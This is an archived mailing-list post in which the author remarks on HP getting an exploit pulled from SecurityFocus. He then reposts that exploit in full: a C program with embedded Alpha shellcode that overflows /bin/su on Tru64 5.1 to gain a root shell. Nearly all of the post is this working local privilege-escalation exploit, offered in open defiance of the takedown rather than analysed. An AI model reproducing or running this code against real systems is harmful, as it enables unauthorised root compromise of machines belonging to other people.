| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: len at netsys.com (Len Rose)
Subject: OT: Snosoft vs HP
It's interesting to note that the exploit was removed from
SecurityFocus' site. I wonder if HP is going to demand people
remove it from all archives everywhere?
Obligatory exploit:
/*
/bin/su tru64 5.1
works with non-exec stack enabled
stripey is the man
developed at http://www.snosoft.com in the cerebrum labs
phased
phased at mail.ru
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* shellcode by Taeho Oh */
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
/* 0x140010401 */
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
Powered by blists - more mailing lists